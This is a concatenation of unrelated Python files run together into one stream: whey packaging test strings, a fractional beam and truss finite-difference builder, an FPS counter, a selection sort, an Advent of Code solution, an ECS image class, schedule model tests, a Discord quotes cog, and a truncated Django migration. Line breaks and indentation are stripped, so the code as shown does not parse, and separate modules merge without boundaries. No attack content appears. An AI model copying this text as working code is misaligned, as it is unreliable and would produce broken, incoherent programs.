"3.10",] python-implementations = [ "CPython", "PyPy",] platforms = [ "Windows", "macOS", "Linux",] license-key = "MIT" """ DYNAMIC_REQUIREMENTS = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "Whey" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." readme = "README.rst" keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] dynamic = [ "classifiers", "dependencies", "requires-python",] [project.license] file = "LICENSE" [[project.authors]] email = "" name = "" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",] python-implementations = [ "CPython", "PyPy",] platforms = [ "Windows", "macOS", "Linux",] license-key = "MIT" package = "whey" """ LONG_REQUIREMENTS = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "Whey" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." readme = "README.rst" dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'", "typed-ast>=1.4.2; python_version < '3.8' and platform_python_implementation == 'CPython'" ] [project.license] file = "LICENSE" [[project.authors]] email = "" name = "" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] license-key = "MIT" package = "whey" """ 0 import fdm from fdm.builder import * from fdm.utils import create_cached_factory import fractional_mechanics import fractulus class FractionalVirtualBoundaryStrategy(enum.Enum): BASED_ON_SECOND_DERIVATIVE = 0 BASED_ON_FOURTH_DERIVATIVE = 1 def create(type_, *args, **kwargs): builder = create_builder() return builder(type_, *args, **kwargs) def create_builder(): builder = Strategy() builder.register('truss1d', create_for_truss_1d) builder.register('beam1d', create_for_beam_1d) return builder def create_for_truss_1d(length, nodes_number): builder = FractionalBuilder1D(length, nodes_number) builder.set_stiffness_factory({ AnalysisStrategy.UP_TO_DOWN: create_truss_stiffness_operators_up_to_down, AnalysisStrategy.DOWN_TO_UP: create_truss_stiffness_operators_down_to_up, }) builder.set_complex_boundary_factory(create_complex_truss_bcs()) return builder def create_for_beam_1d(length, nodes_number): builder = FractionalBuilder1D(length, nodes_number) builder.set_stiffness_factory({ AnalysisStrategy.UP_TO_DOWN: create_beam_stiffness_operators_up_to_down, AnalysisStrategy.DOWN_TO_UP: create_beam_stiffness_operators_down_to_up, }) builder.set_complex_boundary_factory(create_complex_beam_bcs()) return builder FractionalStiffnessInput = collections.namedtuple('FractionalStiffnessInput', ( 'mesh', 'length', 'span', 'strategy', 'young_modulus_controller', 'alpha', 'resolution', 'length_scale_controller', 'moment_of_inertia_controller', 'integration_method', 'fractional_operator_pattern' )) FractionalBCsInput = collections.namedtuple('FractionalBCsInput', ( 'mesh', 'length', 'span', 'virtual_nodes_strategy', 'alpha', 'resolution', 'length_scale_controller', 'moment_of_inertia_controller', 'integration_method', 'young_modulus_controller' )) class FractionalBuilder1D(Builder1d): def __init__(self, length, nodes_number): fdm.builder.Builder1d.__init__(self, length, nodes_number) self._context['alpha'] = 0.8 self._context['resolution'] = None self._context['integration_method'] = 'caputo' default_length_scale = length * 0.1 self.length_scale_controller = None self.set_length_scale_controller('uniform', default_length_scale) self._context['fractional_operator_pattern'] = { 'central': "CCC", 'backward': "CCC", 'forward': "CCC", } def set_fractional_settings(self, alpha, resolution): self._context['alpha'] = alpha self._context['resolution'] = resolution return self def set_fractional_integration_method(self, method): self._context['integration_method'] = method return self def set_length_scale_controller(self, _type, *args, **kwargs): if _type in LENGTH_SCALES_CONTROLLERS: dynamic_lf = UserValueController( self._length, self._nodes_number, LENGTH_SCALES_CONTROLLERS[_type]( self._length, *args, **kwargs) ) else: dynamic_lf = self._create_value_controller(_type, *args, **kwargs) self.length_scale_controller = self._context['length_scale_controller'] = dynamic_lf return self def set_fractional_operator_pattern(self, **kwargs): self._context['fractional_operator_pattern'].update(kwargs) return self def create(self): return super().create() def _create_stiffness_stencils(self, mesh): data = FractionalStiffnessInput( mesh, self._length, self._span, self._context['stiffness_operator_strategy'], self._get_corrected_young_modulus, self._context['alpha'], self._context['resolution'], self._context['length_scale_controller'], self.moment_of_inertia_controller, self._context['integration_method'], self._context['fractional_operator_pattern'] ) return self._stiffness_factory[self._analysis_strategy](data) def _create_complex_bcs(self, mesh): data = FractionalBCsInput( mesh, self._length, self._span, self._context['virtual_boundary_strategy'], self._context['alpha'], self._context['resolution'], self._context['length_scale_controller'], self.moment_of_inertia_controller, self._context['integration_method'], self._get_corrected_young_modulus, ) return self._complex_boundary_factory( self._context['analysis_type'], self._context['boundary'], data) @property def length_scale(self): return self._revolve_for_points(self.length_scale_controller.get) def create_truss_stiffness_operators_up_to_down(data): span = data.span resolution = data.resolution alpha = data.alpha length = data.length settings_builder = dynamic_settings_builder(span, alpha, data.length_scale_controller, resolution) create_strain_operator_builder = create_fractional_strain_operator_builder( span, data.integration_method, settings_builder) fractional_deformation_operator_central = fdm.DynamicElement( create_strain_operator_builder( data.fractional_operator_pattern['central'] ) ) fractional_deformation_operator_backward = fdm.DynamicElement( create_strain_operator_builder( data.fractional_operator_pattern['backward'] ) ) fractional_deformation_operator_forward = fdm.DynamicElement( create_strain_operator_builder( data.fractional_operator_pattern['forward'] ) ) E = data.young_modulus_controller fractional_ep_central = fdm.Operator( fdm.Stencil.central(span=span), fdm.Number(E) * fractional_deformation_operator_central ) fractional_ep_backward = fdm.Operator( fdm.Stencil.backward(span=span), fdm.Number(E) * fractional_deformation_operator_backward ) fractional_ep_forward = fdm.Operator( fdm.Stencil.forward(span=span), fdm.Number(E) * fractional_deformation_operator_forward ) fractional_ep_forward_central = fdm.Operator( fdm.Stencil.forward(span=span), fdm.Number(E) * fractional_deformation_operator_central ) fractional_ep_backward_central = fdm.Operator( fdm.Stencil.backward(span=span), fdm.Number(E) * fractional_deformation_operator_central ) operators = { 'central': fractional_ep_central, 'forward': fractional_ep_forward, 'backward': fractional_ep_backward, 'forward_central': fractional_ep_forward_central, 'backward_central': fractional_ep_backward_central, } def dispatch(point): return { Point(0. + span): operators['forward_central'], Point(length - span): operators['backward_central'], }.get(point, operators['central']) if data.strategy == 'minimize_virtual_layer': return fdm.DynamicElement(dispatch) else: # standard return operators['central'] def create_truss_stiffness_operators_down_to_up(data): return [] def create_beam_stiffness_operators_up_to_down(data): span = data.span resolution = data.resolution alpha = data.alpha length = data.length settings_builder = dynamic_settings_builder(span, alpha, data.length_scale_controller, resolution) E = data.young_modulus_controller I = data.moment_of_inertia_controller central_base_stencils = { 'A': fdm.Stencil.central(span), 'B': fdm.Stencil.central(span), 'C': fdm.Stencil.central(span), 'D': fdm.Stencil.central(span), } backward_base_stencils = { 'A': fdm.Stencil.backward(span), 'B': fdm.Stencil.backward(span), 'C': fdm.Stencil.backward(span), 'D': fdm.Stencil.backward(span), } forward_base_stencils = { 'A': fdm.Stencil.forward(span), 'B': fdm.Stencil.forward(span), 'C': fdm.Stencil.forward(span), 'D': fdm.Stencil.forward(span), } central_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, central_base_stencils, settings_builder) backward_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, backward_base_stencils, settings_builder) forward_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, forward_base_stencils, settings_builder) central_operators = fractional_mechanics.create_beam_stiffness_operators_factory( central_stencils, settings_builder) backward_operators = fractional_mechanics.create_beam_stiffness_operators_factory( backward_stencils, settings_builder) forward_operators = fractional_mechanics.create_beam_stiffness_operators_factory( forward_stencils, settings_builder) def create_operator(operators): return fdm.Number(E) * fdm.Number(I) * operators['D'] operators = { 'central': create_operator(central_operators), 'forward': create_operator(forward_operators), 'backward': create_operator(backward_operators), } def dispatch(point): return { Point(0. + span): operators['forward'], Point(length - span): operators['backward'], }.get(point, operators['central']) if data.strategy == 'minimize_virtual_layer': return fdm.DynamicElement(dispatch) else: # standard return operators['central'] def create_beam_stiffness_operators_down_to_up(data): span = data.span resolution = data.resolution alpha = data.alpha mesh = data.mesh settings_builder = dynamic_settings_builder(span, alpha, data.length_scale_controller, resolution) E = data.young_modulus_controller I = data.moment_of_inertia_controller EI = fdm.Number(E) * fdm.Number(I) central_base_stencils = { 'A': fdm.Stencil.central(span), 'B': fdm.Stencil.central(span), 'C': fdm.Stencil.central(span), 'D': fdm.Stencil.central(span), } wide_central_base_stencils = { 'A': fdm.Stencil.central(2.*span), 'B': fdm.Stencil.central(2.*span), 'C': fdm.Stencil.central(2.*span), 'D': fdm.Stencil.central(2.*span), } backward_base_stencils = { 'A': fdm.Stencil.backward(span), 'B': fdm.Stencil.backward(span), 'C': fdm.Stencil.backward(span), 'D': fdm.Stencil.backward(span), } forward_base_stencils = { 'A': fdm.Stencil.forward(span), 'B': fdm.Stencil.forward(span), 'C': fdm.Stencil.forward(span), 'D': fdm.Stencil.forward(span), } central_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, central_base_stencils, settings_builder) wide_central_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, wide_central_base_stencils, settings_builder) backward_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, backward_base_stencils, settings_builder) forward_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, forward_base_stencils, settings_builder) def get_stencils(key): return [central_stencils[key], wide_central_stencils[key], backward_stencils[key], forward_stencils[key]] def null_factory(point): return fdm.Stencil.null() def build_dispatcher(rules, operator_name): def dispatch(point): central, wide_central, backward, forward = get_stencils(operator_name) if point in rules.null: factory = null_factory elif point in rules.forward: factory = forward elif point in rules.backward: factory = backward elif point in rules.wide_central: factory = wide_central else: factory = central return factory(point) return dispatch class Rules: def __init__(self, null=(), backward=(), forward=(), wide_central=()): self.null = null self.backward = backward self.forward = forward self.wide_central = wide_central def p(idx): return Point(idx*span) virtual_nodes = mesh.virtual_nodes vn = len(virtual_nodes) hvn = int(vn/2.) n = len(mesh.real_nodes) - 1 hn = int(n/2.) left_virtual_nodes = virtual_nodes[:hvn] right_virtual_nodes = virtual_nodes[hvn:] real_nodes = mesh.real_nodes a_range = hn a_rules = Rules( null=left_virtual_nodes[-2:] + right_virtual_nodes[-2:], forward=left_virtual_nodes[:a_range] + real_nodes[:a_range], backward=right_virtual_nodes[:a_range] + real_nodes[-a_range:], ) b_range = hn b_rules = Rules( null=left_virtual_nodes[-2:] + right_virtual_nodes[-2:], # forward=left_virtual_nodes[:b_range] + real_nodes[:b_range], # backward=right_virtual_nodes[:b_range] + real_nodes[-b_range:], ) c_range = hn c_rules = Rules( null=left_virtual_nodes[-2:] + right_virtual_nodes[-2:], forward=left_virtual_nodes[:c_range] + real_nodes[:c_range], backward=right_virtual_nodes[:c_range] + real_nodes[-c_range:], ) scheme_null = left_virtual_nodes + right_virtual_nodes d_range = hn d_rules = Rules( null=scheme_null, # forward=real_nodes[1:d_range], # backward=real_nodes[-d_range:-1], ) if data.strategy == 'minimize_virtual_layer': return [ EI*fdm.DynamicElement(build_dispatcher(a_rules, 'A')), fdm.DynamicElement(build_dispatcher(b_rules, 'B')), fdm.DynamicElement(build_dispatcher(c_rules, 'C')), fdm.DynamicElement(build_dispatcher(d_rules, 'D')), ] else: # standard raise NotImplementedError def create_fractional_strain_operator_builder(span, integration_method, settings_builder): def build(pattern): def create_stencil(point): return fractional_mechanics.create_riesz_caputo_strain_operator_by_pattern( integration_method, settings_builder(point), pattern, span ).to_stencil(Point(0)) def create_id(point): return settings_builder(point) return create_cached_factory(create_stencil, create_id) return build def create_riesz_caputo_stencil_builder(integration_method, settings_builder, multiplier=None): def create(point): settings = settings_builder(point) stencil = fractulus.create_riesz_caputo_stencil(integration_method, settings) m = multiplier(point) if multiplier else 1. return (fdm.Number(m) * stencil).to_stencil(point) def create_id(point): return settings_builder(point) return create_cached_factory(create, create_id) def dynamic_settings_builder(span, alpha, length_scale_controller, resolution): dynamic_lf = length_scale_controller def dynamic_resolution(point): return int(dynamic_lf(point) / span) if resolution is None else resolution def get(point): return fractulus.Settings(alpha, dynamic_lf(point), dynamic_resolution(point)) return get def create_complex_beam_bcs(): strategy = Strategy() strategy.register(fdm.AnalysisType.SYSTEM_OF_LINEAR_EQUATIONS, create_beam_statics_bcs) strategy.register(fdm.AnalysisType.EIGENPROBLEM, create_beam_eigenproblem_bc) return strategy def create_beam_statics_bcs(boundary, data): span = data.span alpha = data.alpha resolution = data.resolution mesh = data.mesh begin_node, end_node = mesh.real_nodes[0], mesh.real_nodes[-1] begin_displacement_fixed = static_boundary(fdm.Scheme({begin_node: 1.}), 0.) end_displacement_fixed = static_boundary(fdm.Scheme({end_node: 1.}), 0.) settings_builder = dynamic_settings_builder(span, alpha, data.length_scale_controller, resolution) E = data.young_modulus_controller def moment_of_inertia_controller(point): return 1. I = moment_of_inertia_controller EI = fdm.Number(E) * fdm.Number(I) central_base_stencils = { 'A': EI*fdm.Stencil.central(span), 'B': fdm.Stencil.central(span), 'C': fdm.Stencil.central(span), 'D': fdm.Stencil.central(span), } central_stencils = fractional_mechanics.create_beam_stiffness_stencils_factory( data.integration_method, central_base_stencils, settings_builder) operators = fractional_mechanics.create_beam_stiffness_operators_factory(central_stencils, settings_builder) begin_A_scheme = operators['A'].expand(begin_node) end_A_scheme = operators['A'].expand(end_node) begin_B_scheme = operators['B'].expand(begin_node) end_B_scheme = operators['B'].expand(end_node) begin_rotation_zero = static_boundary(begin_A_scheme, 0.) end_rotation_zero = static_boundary(end_A_scheme, 0.) begin_moment_zero = static_boundary(begin_B_scheme, 0.) end_moment_zero = static_boundary(end_B_scheme, 0.) bcs = [] left_type = boundary[Side.LEFT].type right_type = boundary[Side.RIGHT].type if left_type == BoundaryType.FIXED: bcs += [ begin_displacement_fixed, begin_rotation_zero, ] elif left_type == BoundaryType.HINGE: bcs += [ begin_displacement_fixed, begin_moment_zero, ] if right_type == BoundaryType.FIXED: bcs += [ end_displacement_fixed, end_rotation_zero, ] elif right_type == BoundaryType.HINGE: bcs += [ end_displacement_fixed, end_moment_zero, ] def p(s, base=0.): return Point(base + span * s) left_vbc_stencil = fdm.Stencil({p(-2): -1., p(-1): 4., p(0): -5., p(2): 5., p(3): -4., p(4): 1.}) right_vbc_stencil = fdm.Stencil({p(2): -1., p(1): 4., p(0): -5., p(-2): 5., p(-3): -4., p(-4): 1.}) virtual_nodes = mesh.virtual_nodes vn = len(virtual_nodes) hvn = int(vn / 2.) left_virtual_nodes = virtual_nodes[:hvn] right_virtual_nodes = virtual_nodes[hvn:] bcs += [static_boundary(left_vbc_stencil.expand(node), 0.) for node in left_virtual_nodes[:-2]] bcs += [static_boundary(right_vbc_stencil.expand(node), 0.) for node in right_virtual_nodes[:-2]] return bcs def create_beam_eigenproblem_bc(length, span, mesh, boundary): # todo: pass return {} def create_complex_truss_bcs(): strategy = Strategy() strategy.register(fdm.AnalysisType.SYSTEM_OF_LINEAR_EQUATIONS, create_truss_statics_bcs) strategy.register(fdm.AnalysisType.EIGENPROBLEM, create_truss_eigenproblem_bc) return strategy def create_truss_statics_bcs(boundary, data): mesh = data.mesh span = data.span begin_node, end_node = mesh.real_nodes[0], mesh.real_nodes[-1] begin_displacement_fixed = static_boundary(fdm.Scheme({begin_node: 1.}), 0.) end_displacement_fixed = static_boundary(fdm.Scheme({end_node: 1.}), 0.) bcs = [] if boundary[Side.LEFT].type == BoundaryType.FIXED: bcs += [ begin_displacement_fixed, ] if boundary[Side.RIGHT].type == BoundaryType.FIXED: bcs += [ end_displacement_fixed, ] def p(s, base=0.): return Point(base + span * s) virtual_nodes = mesh.virtual_nodes vn = len(virtual_nodes) hvn = int(vn / 2.) left_virtual_nodes = virtual_nodes[:hvn] right_virtual_nodes = virtual_nodes[hvn:] if data.virtual_nodes_strategy == VirtualBoundaryStrategy.SYMMETRY: symmetry_stencil = fdm.Stencil({p(-1): -1., p(1): 1.}) bcs += [ static_boundary(symmetry_stencil.expand(left_virtual_nodes[0]), 0.), static_boundary(symmetry_stencil.expand(right_virtual_nodes[0]), 0.) ] elif data.virtual_nodes_strategy == FractionalVirtualBoundaryStrategy.BASED_ON_SECOND_DERIVATIVE: left_vbc_stencil = fdm.Stencil({p(0): -1., p(1): 3., p(2): -3., p(3): 1.}) right_vbc_stencil = fdm.Stencil({p(-3): 1., p(-2): -3., p(-1): 3., p(0): -1.}) bcs += [ static_boundary(left_vbc_stencil.expand(left_virtual_nodes[0]), 0.), static_boundary(right_vbc_stencil.expand(right_virtual_nodes[0]), 0.) ] else: raise NotImplementedError return bcs def create_truss_eigenproblem_bc(boundary, data): mesh = data.mesh begin_node, end_node = mesh.real_nodes[0], mesh.real_nodes[-1] begin_displacement_fixed = dynamic_boundary(fdm.Scheme({begin_node: 1.}), fdm.Scheme({}), replace=begin_node) end_displacement_fixed = dynamic_boundary(fdm.Scheme({end_node: 1.}), fdm.Scheme({}), replace=end_node) bcs = [] if boundary[Side.LEFT].type == BoundaryType.FIXED: bcs += [ begin_displacement_fixed, ] if boundary[Side.RIGHT].type == BoundaryType.FIXED: bcs += [ end_displacement_fixed, ] return bcs def create_vanish_length_scale_corrector(length, init_value, min_value): def correct(point): return max(min_value, min(init_value, point.x, length - point.x)) return correct def create_step_vanish_length_scale_corrector(length, init_value, min_value, span): interval_number = round(length / span) span_init_value = round(init_value / span) span_min_value = round(min_value / span) def correct(point): node_address = point.x / span span_value = max( span_min_value, min( span_init_value, int(node_address) + 1, (interval_number + 1) - round(node_address) ) ) return span_value * span return correct LENGTH_SCALES_CONTROLLERS = { 'vanish': create_vanish_length_scale_corrector, 'step_vanish': create_step_vanish_length_scale_corrector, } 0 #! /usr/bin/env python # -*- coding: utf-8 -*- """ @version: 0.1 @author: quantpy @email: @file: __init__.py.py @time: 2017-08-08 15:15 """ from __future__ import division, print_function, unicode_literals class Main(object): def __init__(self): pass def main(): pass if __name__ == '__main__': try: main() except Exception as err: print(repr(err)) ################################################################################ # SPDX-FileCopyrightText: Copyright (c) 2019-2021 NVIDIA CORPORATION & AFFILIATES. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ################################################################################ import time start_time=time.time() frame_count=0 class GETFPS: def __init__(self,stream_id): global start_time self.start_time=start_time self.is_first=True global frame_count self.frame_count=frame_count self.stream_id=stream_id def get_fps(self): end_time=time.time() if(self.is_first): self.start_time=end_time self.is_first=False if(end_time-self.start_time>5): print("**********************FPS*****************************************") print("Fps of stream",self.stream_id,"is ", float(self.frame_count)/5.0) self.frame_count=0 self.start_time=end_time else: self.frame_count=self.frame_count+1 def print_data(self): print('frame_count=',self.frame_count) print('start_time=',self.start_time) def selection_sort(array): current_index = 0 while current_index < len(array) - 1: smallest_index = current_index for i in range(current_index + 1, len(array)): if array[smallest_index] > array[i]: smallest_index =i array[current_index], array[smallest_index] = array[smallest_index], array[current_index] current_index +=1 return array 2019/day1.py import math day_num = 1 file_load = open("input/day1.txt", "r") file_in = file_load.read() file_load.close() file_in = list(map(int, file_in.split("\n"))) def run(): def fuel(input_mass): return math.floor(input_mass / 3) - 2 def launch(input_in): fuel_total = 0 for temp_mass in input_in: fuel_total += fuel(temp_mass) return fuel_total def stonk(input_in): fuel_total = 0 for temp_mass in input_in: while temp_mass >= 0: fuel_calc = fuel(temp_mass) if fuel_calc > 0: fuel_total += fuel_calc temp_mass = fuel_calc else: temp_mass = -1 return fuel_total return launch(file_in), stonk(file_in) if __name__ == "__main__": print(run())0 class image(object): """description of class""" """ Represents an ECS Image """ from footmark.ecs.ecsobject import TaggedECSObject class Image(TaggedECSObject): def __init__(self, connection=None): super(Image, self).__init__(connection) self.tags = {} def __repr__(self): return 'Image:%s' % self.id def __getattr__(self, name): if name == 'id': return self.image_id if name == 'name': return self.image_name raise AttributeError def __setattr__(self, name, value): if name == 'id': self.image_id = value if name == 'name': self.image_name = value if name == 'tags' and value: v = {} for tag in value['tag']: v[tag.get('TagKey')] = tag.get('TagValue', None) value = v super(TaggedECSObject, self).__setattr__(name, value) def delete(self): """ Terminate the image """ return self.connection.delete_image(self.id) spec/rift/data/models/schedule.py import uuid from specter import Spec, DataSpec, expect, skip from rift.data.models.schedule import Schedule, Entry from spec.rift.api.resources.fixtures import MockedDatabase example_schedule_dict = { 'id': '1234', 'name': 'my schedule', 'entries': [ { "job_id": "job1", "delay": "01:02:03", } ] } class ScheduleModel(Spec): class Deserialization(Spec): def can_deserialize_from_a_dictionary(self): tenant_id = str(uuid.uuid4()) schedule = Schedule.build_schedule_from_dict( tenant_id, example_schedule_dict) expect(schedule.tenant_id).to.equal(tenant_id) expect(schedule.schedule_id).to.equal('1234') expect(schedule.name).to.equal('my schedule') expect(schedule.entries[0].job_id).to.equal('job1') expect(schedule.entries[0].delay).to.equal("01:02:03") class Serialization(Spec): def can_serialize_to_a_dictionary(self): entry = Entry(job_id='job1', delay="01:02:03") schedule = Schedule(tenant_id='tenant1', schedule_id='schedule1', entries=[entry], name='my schedule') schedule_dict = schedule.as_dict() expect(schedule_dict.get('id')).to.equal('schedule1') expect(schedule_dict.get('name')).to.equal('my schedule') expect(len(schedule_dict.get('entries', []))).to.equal(1) e = schedule_dict['entries'][0] expect(e.get('job_id')).to.equal('job1') expect(e.get('delay')).to.equal("01:02:03") class DatabaseActions(MockedDatabase): def before_each(self): super(type(self), self).before_each() self.tenant_id = str(uuid.uuid4()) self.schedule = Schedule.build_schedule_from_dict( self.tenant_id, example_schedule_dict) Schedule.save_schedule(self.schedule) def can_save_and_get_a_schedule(self): found = Schedule.get_schedule( self.tenant_id, self.schedule.schedule_id) expect(found.as_dict()).to.equal(example_schedule_dict) def should_fail_to_get_missing_schedule(self): found = Schedule.get_schedule(self.tenant_id, str(uuid.uuid4())) expect(found).to.be_none() def can_get_schedules(self): schedules = Schedule.get_schedules(self.tenant_id) expect(len(schedules)).to.equal(1) expect(schedules[0].as_dict()).to.equal(example_schedule_dict) @skip('Fails - "not enough arguments for format string" in mongomock') def can_delete(self): Schedule.delete_schedule(self.schedule.schedule_id) found = Schedule.get_schedule( self.tenant_id, self.schedule.schedule_id) expect(found).to.be_none() class Entry(DataSpec): DATASET = { 'zero_delay': { "delay": "00:00:00", "result": 0, }, 'delay_with_nonzero_seconds': { "delay": "00:00:93", "result": 93, }, 'delay_with_nonzero_minutes': { "delay": "00:84:00", "result": 5040, }, 'delay_with_nonzero_hours': { "delay": "67:00:00", "result": 241200, }, 'delay_with_hours_minutes_and_seconds': { "delay": "12:34:56", "result": 45296, }, } def can_get_total_seconds_for(self, delay, result): entry = Entry(job_id=str(uuid.uuid4()), delay=delay) expect(entry.get_total_seconds()).to.equal(result) from pathlib import Path from random import randint import discord from redbot.core import checks, commands from redbot.core.bot import Red from redbot.core.i18n import cog_i18n from redbot.core.utils.chat_formatting import error, warning from cog_shared.swift_libs import ( Page, PaginatedMenu, chunks, confirm, fmt, tick, to_lazy_translator, trim_to, ) from quotes.editor import QuoteEditor from quotes.quote import Quote, conf, ensure_can_modify, i18n from quotes.v2_import import import_v2_data lazyi18n = to_lazy_translator(i18n) @cog_i18n(i18n) class Quotes: """Save and retrieve quotes""" __author__ = "odinair <>" DELETE_WARNING = lazyi18n( "Are you sure you want to delete this quote?\n\n" "Unless you have a time machine, this action **cannot be undone**." ) def __init__(self, bot: Red): self.bot = bot self.config = conf Quote.bot = self.bot @commands.group(name="quote", aliases=["quotes"], invoke_without_command=True) @commands.guild_only() async def quote(self, ctx: commands.Context, quote: Quote = None): """Save and retrieve quotes If no quote is given, a random quote is retrieved instead. """ if quote is None: quotes = len(await self.config.guild(ctx.guild).quotes()) if not quotes: await ctx.send_help() return quote = await Quote.get(ctx.guild, randint(1, quotes)) await ctx.send(embed=quote.embed) @quote.command(hidden=True, name="lorem") @checks.is_owner() async def quote_lorem_ipsum(self, ctx: commands.Context, amount: int = 100): """Generates some junk lorem ipsum quotes. This is basically only useful if you're working on Quotes itself, and need some data to test with. **Requires the `loremipsum` module (`[p]pipinstall loremipsum`).** """ try: import loremipsum except ImportError: await ctx.send( error( i18n( "Failed to import the `loremipsum` module; please do `{prefix}pipinstall " "loremipsum` and use this command again." ).format(prefix=ctx.prefix) ) ) return import re for _ in range(amount): await Quote.create( " ".join( [ " ".join( [re.sub(r"[Bb]\'(.*)\'", lambda x: x.group(1), x) for x in y.split()] ).capitalize() for y in loremipsum.get_sentences(3) ] ), ctx.author, ) await ctx.send("Generated {} quotes.".format(amount)) @quote.command(hidden=True, name="clearall") @checks.guildowner() async def quote_clearall(self, ctx: commands.Context): if not await confirm( ctx, content=i18n( "Are you sure you want to reset all quotes?\n\nUnless you have a time machine, " "**this action is irreversible.**" ), ): await ctx.send(i18n("Operation cancelled.")) return await self.config.guild(ctx.guild).quotes.set([]) await ctx.tick() @quote.command(hidden=True, name="v2_import") @checks.is_owner() async def quote_v2_import(self, ctx: commands.Context, path: str): """Import quotes data from a Red v2 instance""" path = Path(path) / "data" / "quotes" / "quotes.json" if not path.is_file(): await ctx.send(error(i18n("That file path doesn't seem to be valid"))) return async with ctx.typing(): await import_v2_data(config=self.config, path=path) await ctx.send(tick(i18n("Imported data successfully."))) @quote.command(name="add") async def quote_add(self, ctx: commands.Context, *, message: str): """Add a quote""" quote = await Quote.create(message, ctx.author, ctx.author) await ctx.send(tick(i18n("Quote added")), embed=quote.embed) @quote.command(name="message") async def quote_message(self, ctx: commands.Context, message: int): """Quote a message by it's ID The message specified must be in the same channel this command is executed in You can obtain a message's ID by enabling Developer Mode in your Appearance settings, and clicking Copy ID in the message's context menu """ try: message = await ctx.get_message(message) except discord.NotFound: await ctx.send( warning(i18n("I couldn't find that message. (is it in a different channel?)")) ) except discord.Forbidden: await ctx.send(warning(i18n("I'm not allowed to retrieve that message"))) else: quote = await Quote.create(message.content, ctx.author, message.author) await ctx.send(tick(i18n("Quote added")), embed=quote.embed) @quote.group(name="edit", aliases=["modify"], invoke_without_command=True) async def quote_edit(self, ctx: commands.Context, quote: Quote): """Interactive quote editor This requires you to be the quote creator, the attributed author or a guild moderator or administrator. """ await ensure_can_modify(ctx.author, quote) await QuoteEditor(ctx, quote)() @quote_edit.command(name="author") async def edit_author(self, ctx: commands.Context, quote: Quote, *, author: discord.Member): """Attribute a quote to the specified user This requires you to be the quote creator, an administrator or moderator """ await ensure_can_modify(ctx.author, quote) quote.edited = True quote.message_author = author await quote.save() await ctx.send( tick(i18n("Attributed quote #{} to **{}**.").format(int(quote), str(author))) ) @quote.command(name="list") async def quote_list(self, ctx: commands.Context, per_page: int = 8): """List the quotes in the current guild Maximum amount of quotes per page is 15; any higher values are silently reduced to this limit. """ quotes = await Quote.all_quotes(ctx.guild) if not quotes: return await fmt( ctx, warning(i18n("This guild has no quotes! Use `{prefix}quote add` to add some!")) ) per_page = min(per_page, 15) def convert(page: Page): embed = discord.Embed( colour=ctx.me.colour, title=i18n("Guild Quotes"), description=i18n("Displaying {} out of {} quotes").format( len(page.data), len(quotes) ), ) embed.set_footer(text=i18n("Page {0.current} out of {0.total}").format(page)) for q in page.data: embed.add_field( name=i18n("Quote #{}").format(q.id), value=trim_to(q.text, min(5000 // per_page, 1024)), inline=False, ) return embed await PaginatedMenu( ctx=ctx, pages=list(chunks(quotes, per_page)), converter=convert, actions={}, wrap_around=True, ) @quote.command(name="remove", aliases=["rm", "delete"]) async def quote_remove(self, ctx: commands.Context, quote: Quote): """Remove a quote by it's ID This requires you to either be the quote's creator, an administrator, moderator, or the attributed message author. """ await ensure_can_modify(ctx.author, quote) if await confirm(ctx, content=warning(self.DELETE_WARNING)): await quote.delete() await ctx.send(tick(i18n("Quote successfully deleted."))) else: await ctx.send(i18n("Ok then.")) src/apps/profiles/migrations/0001_initial.py0 # Generated by Django 2.1 on 2018-08-10 04:31 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import uuid class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Profile', fields=[ ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), ('state', models.PositiveSmallIntegerField(choices=[(29, 'Tlaxcala')], default=29)), ('site', models.PositiveSmallIntegerField(choices=[(0, 'Junta Local'), (1, '01 Junta Distrital'), (2, '02 Junta Distrital'), (3, 'O3 Junta Distrital')], default=0)), ('position', models.CharField(choices=[('VEL', 'Vocal Ejecutivo de Junta Local'), ('VSL', 'Vocal Secretario de Junta Local'), ('VRL', 'Vocal del RFE de Junta Local'), ('VCL', 'Vocal de Capacitación de Junta Local'), ('VOL', 'Vocal de Organización de Junta Local'), ('VED', 'Vocal Ejecutivo de Junta Distrital'), ('VSD', 'Vocal Secretario de Junta Distrital'), ('VRD', 'Vocal del RFE de Junta Distrital'), ('VCD', 'Vocal de Capacitación de Junta Distrital'), ('VOD', 'Vocal de Organización de Junta Distrital'), ('JOSA', 'JOSA'), ('JOSAD', 'JOSAD'), ('JMM', 'Jefe de Monitoreo a Módulos'), ('JOCE', 'Jefe de Cartografía'), ('RA', 'Rama Administrativa')], default='RA', max_length=5)), ('order', models.PositiveSmallIntegerField(blank=True, default=99, null=True)), ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, 